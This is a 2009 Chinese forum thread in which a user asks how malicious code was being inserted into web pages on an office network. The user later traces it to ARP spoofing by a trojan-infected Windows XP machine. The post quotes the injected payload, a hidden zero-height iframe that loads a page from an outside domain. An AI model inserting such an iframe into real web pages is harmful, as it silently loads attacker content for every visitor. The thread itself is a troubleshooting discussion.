设为首页
收藏本站
用户名
Email
自动登录
找回密码
密码
登录
注册
快捷导航
平台
Portal
论坛
BBS
文库
项目
群组
Group
我的博客
Space
搜索
搜索
热搜:
shell
linux
mysql
本版
用户
LinuxSir.cn,穿越时空的Linuxsir!
»
论坛
›
运维技术 —— LinuxSir.cn
›
网络技术\网络安全讨论
›
恶意代码是怎么插入网页的?
返回列表
查看:
1085
|
回复:
1
恶意代码是怎么插入网页的?
[复制链接]
Yei
Yei
当前离线
积分
764
IP卡
狗仔卡
发表于 2009-5-7 11:45:48
|
显示全部楼层
|
阅读模式
前段时间公司有机器中毒了(windows xp),导致局域网内所有机器打开的网页前面都插入了类似下面的代码:
[HTML]<iframe src=http://xx2.mao9988.cn/index.htm width=100 height=0></iframe>[/HTML]
用Wireshark抓包没发现那台机器有通过arp欺骗将自己伪装成网关之类的行为,不知道它是通过什么方法插入的。
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
Yei
Yei
当前离线
积分
764
IP卡
狗仔卡
楼主
|
发表于 2009-5-12 15:11:41
|
显示全部楼层
对不起大家,还我自己搞错了
今天又发现同样的情况,并且抓到了ARP欺骗包
奇怪的是在一台机器上能抓到这些包,另一台机器上抓不到,难道就因为它们在不同的交换机下?
用杀毒软件扫了一下,中的是Win32/VB.NZV特洛伊木马,在D盘根目录下有个gdiplus.exe文件
回复
支持
反对
使用道具
举报
显身卡
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
本版积分规则
发表回复
回帖后跳转到最后一页
Copyright © 2002-2023
LinuxSir.cn
(http://www.linuxsir.cn/) 版权所有 All Rights Reserved.
Powered by
RedflagLinux!
技术支持:
中科红旗
|
京ICP备19024520号
快速回复
返回顶部
返回列表
IP卡
狗仔卡
发表于 2009-5-7 11:45:48
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
楼主